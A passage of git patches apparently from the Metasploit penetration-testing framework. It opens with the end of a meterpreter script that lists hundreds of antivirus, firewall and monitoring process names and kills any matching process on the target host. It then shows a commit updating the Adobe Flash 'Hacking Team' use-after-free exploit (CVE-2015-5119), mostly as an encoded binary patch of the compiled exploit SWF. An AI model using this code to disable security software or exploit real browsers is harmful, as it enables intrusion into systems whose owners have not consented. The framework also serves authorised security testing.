+  ntrtscan.exe
+  ntvdm.exe
+  ntxconfig.exe
+  nui.exe
+  nupgrade.exe
+  nvarch16.exe
+  nvc95.exe
+  nvsvc32.exe
+  nwinst4.exe
+  nwservice.exe
+  nwtool16.exe
+  ollydbg.exe
+  onsrvr.exe
+  optimize.exe
+  ostronet.exe
+  otfix.exe
+  outpost.exe
+  outpostinstall.exe
+  outpostproinstall.exe
+  padmin.exe
+  panixk.exe
+  patch.exe
+  pavcl.exe
+  pavproxy.exe
+  pavsched.exe
+  pavw.exe
+  pccwin98.exe
+  pcfwallicon.exe
+  pcip10117_0.exe
+  pcscan.exe
+  pdsetup.exe
+  periscope.exe
+  persfw.exe
+  perswf.exe
+  pf2.exe
+  pfwadmin.exe
+  pgmonitr.exe
+  pingscan.exe
+  platin.exe
+  pop3trap.exe
+  poproxy.exe
+  popscan.exe
+  portdetective.exe
+  portmonitor.exe
+  powerscan.exe
+  ppinupdt.exe
+  pptbc.exe
+  ppvstop.exe
+  prizesurfer.exe
+  prmt.exe
+  prmvr.exe
+  procdump.exe
+  processmonitor.exe
+  procexplorerv1.0.exe
+  programauditor.exe
+  proport.exe
+  protectx.exe
+  pspf.exe
+  purge.exe
+  qconsole.exe
+  qserver.exe
+  rapapp.exe
+  rav7.exe
+  rav7win.exe
+  rav8win32eng.exe
+  ray.exe
+  rb32.exe
+  rcsync.exe
+  realmon.exe
+  reged.exe
+  regedit.exe
+  regedt32.exe
+  rescue.exe
+  rescue32.exe
+  rrguard.exe
+  rshell.exe
+  rtvscan.exe
+  rtvscn95.exe
+  rulaunch.exe
+  run32dll.exe
+  rundll.exe
+  rundll16.exe
+  ruxdll32.exe
+  safeweb.exe
+  sahagent.exescan32.exe
+  shstat.exe
+  tbmon.exe
+  vstskmgr.exe
+  engineserver.exe
+  mfevtps.exe
+  mfeann.exe
+  mcscript.exe
+  updaterui.exe
+  udaterui.exe
+  naprdmgr.exe
+  frameworkservice.exe
+  cleanup.exe
+  cmdagent.exe
+  frminst.exe
+  mcscript_inuse.exe
+  mctray.exe
+  mcshield.exe
+  save.exe
+  savenow.exe
+  sbserv.exe
+  sc.exe
+  scam32.exe
+  scan32.exe
+  scan95.exe
+  scanpm.exe
+  scrscan.exe
+  serv95.exe
+  setup_flowprotector_us.exe
+  setupvameeval.exe
+  sfc.exe
+  sgssfw32.exe
+  sh.exe
+  shellspyinstall.exe
+  shn.exe
+  showbehind.exe
+  smc.exe
+  sms.exe
+  smss32.exe
+  soap.exe
+  sofi.exe
+  sperm.exe
+  spf.exe
+  sphinx.exe
+  spoler.exe
+  spoolcv.exe
+  spoolsv32.exe
+  spyxx.exe
+  srexe.exe
+  srng.exe
+  ss3edit.exe
+  ssg_4104.exe
+  ssgrate.exe
+  st2.exe
+  start.exe
+  stcloader.exe
+  supftrl.exe
+  support.exe
+  supporter5.exe
+  svc.exe
+  svchostc.exe
+  svchosts.exe
+  svshost.exe
+  sweep95.exe
+  sweepnet.sweepsrv.sys.swnetsup.exe
+  symproxysvc.exe
+  symtray.exe
+  sysedit.exe
+  system.exe
+  system32.exe
+  sysupd.exe
+  taskmg.exe
+  taskmo.exe
+  taskmon.exe
+  taumon.exe
+  tbscan.exe
+  tc.exe
+  tca.exe
+  tcm.exe
+  tds-3.exe
+  tds2-98.exe
+  tds2-nt.exe
+  teekids.exe
+  tfak.exe
+  tfak5.exe
+  tgbob.exe
+  titanin.exe
+  titaninxp.exe
+  tracert.exe
+  trickler.exe
+  trjscan.exe
+  trjsetup.exe
+  trojantrap3.exe
+  tsadbot.exe
+  tvmd.exe
+  tvtmd.exe
+  undoboot.exe
+  updat.exe
+  update.exe
+  upgrad.exe
+  utpost.exe
+  vbcmserv.exe
+  vbcons.exe
+  vbust.exe
+  vbwin9x.exe
+  vbwinntw.exe
+  vcsetup.exe
+  vet32.exe
+  vet95.exe
+  vettray.exe
+  vfsetup.exe
+  vir-help.exe
+  virusmdpersonalfirewall.exe
+  vnlan300.exe
+  vnpc3000.exe
+  vpc32.exe
+  vpc42.exe
+  vpfw30s.exe
+  vptray.exe
+  vscan40.exe
+  vscenu6.02d30.exe
+  vsched.exe
+  vsecomr.exe
+  vshwin32.exe
+  vsisetup.exe
+  vsmain.exe
+  vsmon.exe
+  vsstat.exe
+  vswin9xe.exe
+  vswinntse.exe
+  vswinperse.exe
+  w32dsm89.exe
+  w9x.exe
+  watchdog.exe
+  webdav.exe
+  webscanx.exe
+  webtrap.exe
+  wfindv32.exe
+  whoswatchingme.exe
+  wimmun32.exe
+  win-bugsfix.exe
+  win32.exe
+  win32us.exe
+  winactive.exe
+  window.exe
+  windows.exe
+  wininetd.exe
+  wininitx.exe
+  winlogin.exe
+  winmain.exe
+  winnet.exe
+  winppr32.exe
+  winrecon.exe
+  winservn.exe
+  winssk32.exe
+  winstart.exe
+  winstart001.exe
+  wintsk32.exe
+  winupdate.exe
+  wkufind.exe
+  wnad.exe
+  wnt.exe
+  wradmin.exe
+  wrctrl.exe
+  wsbgate.exe
+  wupdater.exe
+  wupdt.exe
+  wyvernworksfirewall.exe
+  xpf202en.exe
+  zapro.exe
+  zapsetup3001.exe
+  zatutor.exe
+  zonalm2601.exe
+  zonealarm.exe
+}
+
+   client.sys.process.get_processes().each do |x|
+     if (avs.index(x['name'].downcase))
+       print_status("Killing off #{x['name']}...")
+       client.sys.process.kill(x['pid'])
+     end
+   end
+end
+
+
+
+end

From b504f0be8ed8bad4be8c4e935eb99a18f6528b9f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 15 Jul 2015 18:18:04 -0500
Subject: [PATCH 0791/1013] Update adobe_flash_hacking_team_uaf

---
 data/exploits/CVE-2015-5119/msf.swf           | Bin 29417 -> 49715 bytes
 .../source/exploits/CVE-2015-5119/Exploit.as  |  21 ++-
 .../exploits/CVE-2015-5119/Exploiter.as       | 152 +++++++-----------
 .../source/exploits/CVE-2015-5119/MyClass.as  |  25 +--
 .../browser/adobe_flash_hacking_team_uaf.rb   |  14 +-
 5 files changed, 89 insertions(+), 123 deletions(-)

diff --git a/data/exploits/CVE-2015-5119/msf.swf b/data/exploits/CVE-2015-5119/msf.swf
index 6c2d91cdcc18d1dce6aebf1f909d867b72007e9c..f083d2aa4b6e102f6558ee4971854744abac8d2f 100755
GIT binary patch
literal 49715
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
